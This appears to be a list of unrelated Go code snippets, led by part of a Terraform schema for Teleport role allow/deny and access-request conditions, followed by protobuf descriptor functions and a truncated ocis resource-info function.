{\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is a list of resources this role is allowed to impersonate\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Where specifies optional advanced matcher\n\t\t\t\t\t\t\t\t\t\t\t\"where\": {\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Where specifies optional advanced matcher\",\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// ReviewRequests defines conditions for submitting access reviews.\n\t\t\t\t\t\t\t\t\"review_requests\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tMaxItems: 1,\n\t\t\t\t\t\t\t\t\tDescription: \"AccessReviewConditions is a matcher for allow/deny restrictions on access reviews.\",\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t// Roles is the name of roles which may be reviewed.\n\t\t\t\t\t\t\t\t\t\t\t\"roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is the name of roles which may be reviewed.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// ClaimsToRoles specifies a mapping from claims (traits) to teleport roles.\n\t\t\t\t\t\t\t\t\t\t\t\"claims_to_roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"ClaimsToRoles specifies a mapping from claims (traits) to teleport roles.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Claim is a claim name.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"claim\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Claim is a claim name.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Value is a claim value to match.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"value\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Value is a claim value to match.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Roles is a list of static teleport roles to match.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is a list of static teleport roles to match.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Where is an optional predicate which further limits which requests are\n\t\t\t\t\t\t\t\t\t\t\t// reviewable.\n\t\t\t\t\t\t\t\t\t\t\t\"where\": {\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Where is an optional predicate which further limits which requests are reviewable.\",\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tDefault: \"\",\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\t// Deny is the set of conditions evaluated to deny access. Deny takes priority\n\t\t\t\t\t// over allow.\n\t\t\t\t\t\"deny\": {\n\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\tMaxItems: 1,\n\t\t\t\t\t\tDescription: \"RoleConditions is a set of conditions that must all match to be allowed or denied access.\",\n\n\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t// Logins is a list of *nix system logins.\n\t\t\t\t\t\t\t\t\"logins\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"Logins is a list of *nix system logins.\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// NodeLabels is a map of node labels (used to dynamically grant access to\n\t\t\t\t\t\t\t\t// nodes).\n\t\t\t\t\t\t\t\t\"node_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// Rules is a list of rules and their access levels. Rules are a high level\n\t\t\t\t\t\t\t\t// construct used for access control.\n\t\t\t\t\t\t\t\t\"rules\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"Rules is a list of rules and their access levels. Rules are a high level construct used for access control.\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t// Resources is a list of resources\n\t\t\t\t\t\t\t\t\t\t\t\"resources\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Resources is a list of resources\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Verbs is a list of verbs\n\t\t\t\t\t\t\t\t\t\t\t\"verbs\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Verbs is a list of verbs\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Where specifies optional advanced matcher\n\t\t\t\t\t\t\t\t\t\t\t\"where\": {\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Where specifies optional advanced matcher\",\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Actions specifies optional actions taken when this rule matches\n\t\t\t\t\t\t\t\t\t\t\t\"actions\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Actions specifies optional actions taken when this rule matches\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// KubeGroups is a list of kubernetes groups\n\t\t\t\t\t\t\t\t\"kube_groups\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"KubeGroups is a list of kubernetes groups\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\n\t\t\t\t\t\t\t\t\"request\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tMaxItems: 1,\n\t\t\t\t\t\t\t\t\tDescription: \"AccessRequestConditions is a matcher for allow/deny restrictions on access-requests.\",\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t// Roles is the name of roles which will match the request rule.\n\t\t\t\t\t\t\t\t\t\t\t\"roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is the name of roles which will match the request rule.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// ClaimsToRoles specifies a mapping from claims (traits) to teleport roles.\n\t\t\t\t\t\t\t\t\t\t\t\"claims_to_roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"ClaimsToRoles specifies a mapping from claims (traits) to teleport roles.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Claim is a claim name.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"claim\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Claim is a claim name.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Value is a claim value to match.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"value\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Value is a claim value to match.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Roles is a list of static teleport roles to match.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is a list of static teleport roles to match.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Annotations is a collection of annotations to be programmatically\n\t\t\t\t\t\t\t\t\t\t\t// appended to pending access requests at the time of their creation.\n\t\t\t\t\t\t\t\t\t\t\t// These annotations serve as a mechanism to propagate extra information\n\t\t\t\t\t\t\t\t\t\t\t// to plugins. Since these annotations support variable interpolation\n\t\t\t\t\t\t\t\t\t\t\t// syntax, they also offer a mechanism for forwarding claims from an\n\t\t\t\t\t\t\t\t\t\t\t// external identity provider, to a plugin via `{{external.trait_name}}`\n\t\t\t\t\t\t\t\t\t\t\t// style substitutions.\n\t\t\t\t\t\t\t\t\t\t\t\"annotations\": SchemaTraits(),\n\t\t\t\t\t\t\t\t\t\t\t// Thresholds is a list of thresholds, one of which must be met in order for reviews\n\t\t\t\t\t\t\t\t\t\t\t// to trigger a state-transition. If no thresholds are provided, a default threshold\n\t\t\t\t\t\t\t\t\t\t\t// of 1 for approval and denial is used.\n\t\t\t\t\t\t\t\t\t\t\t\"thresholds\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Thresholds is a list of thresholds, one of which must be met in order for reviews to trigger a state-transition. If no thresholds are provided, a default threshold of 1 for approval and denial is used.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Name is the optional human-readable name of the threshold.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"name\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Name is the optional human-readable name of the threshold.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Filter is an optional predicate used to determine which reviews\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// count toward this threshold.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"filter\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Filter is an optional predicate used to determine which reviews count toward this threshold.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Approve is the number of matching approvals needed for state-transition.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"approve\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeInt,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Approve is the number of matching approvals needed for state-transition.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Deny is the number of denials needed for state-transition.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"deny\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeInt,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Deny is the number of denials needed for state-transition.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// SuggestedReviewers is a list of reviewer suggestions. These can be teleport usernames, but\n\t\t\t\t\t\t\t\t\t\t\t// that is not a requirement.\n\t\t\t\t\t\t\t\t\t\t\t\"suggested_reviewers\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"SuggestedReviewers is a list of reviewer suggestions. These can be teleport usernames, but that is not a requirement.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// KubeUsers is an optional kubernetes users to impersonate\n\t\t\t\t\t\t\t\t\"kube_users\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"KubeUsers is an optional kubernetes users to impersonate\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// AppLabels is a map of labels used as part of the RBAC system.\n\t\t\t\t\t\t\t\t\"app_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// ClusterLabels is a map of node labels (used to dynamically grant access to\n\t\t\t\t\t\t\t\t// clusters).\n\t\t\t\t\t\t\t\t\"cluster_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// KubernetesLabels is a map of kubernetes cluster labels used for RBAC.\n\t\t\t\t\t\t\t\t\"kubernetes_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// DatabaseLabels are used in RBAC system to allow/deny access to databases.\n\t\t\t\t\t\t\t\t\"database_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// DatabaseNames is a list of database names this role is allowed to connect to.\n\t\t\t\t\t\t\t\t\"database_names\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"DatabaseNames is a list of database names this role is allowed to connect to.\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// DatabaseUsers is a list of databaes users this role is allowed to connect as.\n\t\t\t\t\t\t\t\t\"database_users\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"DatabaseUsers is a list of databaes users this role is allowed to connect as.\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// Impersonate specifies what users and roles this role is allowed to impersonate\n\t\t\t\t\t\t\t\t// by issuing certificates or other possible means.\n\t\t\t\t\t\t\t\t\"impersonate\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tMaxItems: 1,\n\t\t\t\t\t\t\t\t\tDescription: \"ImpersonateConditions specifies whether users are allowed to issue certificates for other users or groups.\",\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t// Users is a list of resources this role is allowed to impersonate,\n\t\t\t\t\t\t\t\t\t\t\t// could be an empty list or a Wildcard pattern\n\t\t\t\t\t\t\t\t\t\t\t\"users\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Users is a list of resources this role is allowed to impersonate, could be an empty list or a Wildcard pattern\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Roles is a list of resources this role is allowed to impersonate\n\t\t\t\t\t\t\t\t\t\t\t\"roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is a list of resources this role is allowed to impersonate\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Where specifies optional advanced matcher\n\t\t\t\t\t\t\t\t\t\t\t\"where\": {\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Where specifies optional advanced matcher\",\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// ReviewRequests defines conditions for submitting access reviews.\n\t\t\t\t\t\t\t\t\"review_requests\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tMaxItems: 1,\n\t\t\t\t\t\t\t\t\tDescription: \"AccessReviewConditions is a matcher for allow/deny restrictions on access reviews.\",\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t// Roles is the name of roles which may be reviewed.\n\t\t\t\t\t\t\t\t\t\t\t\"roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is the name of roles which may be reviewed.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// ClaimsToRoles specifies a mapping from claims (traits) to teleport roles.\n\t\t\t\t\t\t\t\t\t\t\t\"claims_to_roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"ClaimsToRoles specifies a mapping from claims (traits) to teleport roles.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Claim is a claim name.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"claim\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Claim is a claim name.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Value is a claim value to match.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"value\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Value is a claim value to match.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Roles is a list of static teleport roles to match.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is a list of static teleport roles to match.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Where is an optional predicate which further limits which requests are\n\t\t\t\t\t\t\t\t\t\t\t// reviewable.\n\t\t\t\t\t\t\t\t\t\t\t\"where\": {\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Where is an optional predicate which further limits which requests are reviewable.\",\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tDefault: \"\",\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n}", "func (*Role) Descriptor() ([]byte, []int) {\n\treturn file_protodef_user_user_proto_rawDescGZIP(), []int{10}\n}", "func (*UserListByIdsRep) Descriptor() ([]byte, []int) {\n\treturn file_proto_user_proto_rawDescGZIP(), []int{12}\n}", "func (*PermissionAttributes) Descriptor() ([]byte, []int) {\n\treturn file_protodef_user_user_proto_rawDescGZIP(), []int{21}\n}", "func (*AccountChangeAuthorizationSettingsRequest) TypeID() uint32 {\n\treturn AccountChangeAuthorizationSettingsRequestTypeID\n}", "func (*Resource) Descriptor() ([]byte, []int) {\n\treturn file_ocis_messages_settings_v0_settings_proto_rawDescGZIP(), []int{3}\n}", "func describeUser(u User) string {\n description := fmt.Sprintf(\"Name: %s %s, Email: %s, ID: %d\", u.FirstName, u.LastName, u.Email, u.ID)\n return description \n}", "func (*NewRoleRelationships_Permissions) Descriptor() ([]byte, []int) {\n\treturn file_protodef_user_user_proto_rawDescGZIP(), []int{15, 0}\n}", "func (n *Node) AsResourceInfo(ctx context.Context, rp *provider.ResourcePermissions, mdKeys []string, returnBasename bool) (ri *provider.ResourceInfo, err error) {\n\tsublog := appctx.GetLogger(ctx).With().Interface(\"node\", n).Logger()\n\n\tvar fn string\n\tnodePath := n.lu.InternalPath(n.ID)\n\n\tvar fi os.FileInfo\n\n\tnodeType := provider.ResourceType_RESOURCE_TYPE_INVALID\n\tif fi, err = os.Lstat(nodePath); err != nil {\n\t\treturn\n\t}\n\n\tvar target []byte\n\tswitch {\n\tcase fi.IsDir():\n\t\tif target, err = xattr.Get(nodePath, xattrs.ReferenceAttr); err == nil {\n\t\t\tnodeType = provider.ResourceType_RESOURCE_TYPE_REFERENCE\n\t\t} else {\n\t\t\tnodeType = provider.ResourceType_RESOURCE_TYPE_CONTAINER\n\t\t}\n\tcase fi.Mode().IsRegular():\n\t\tnodeType = 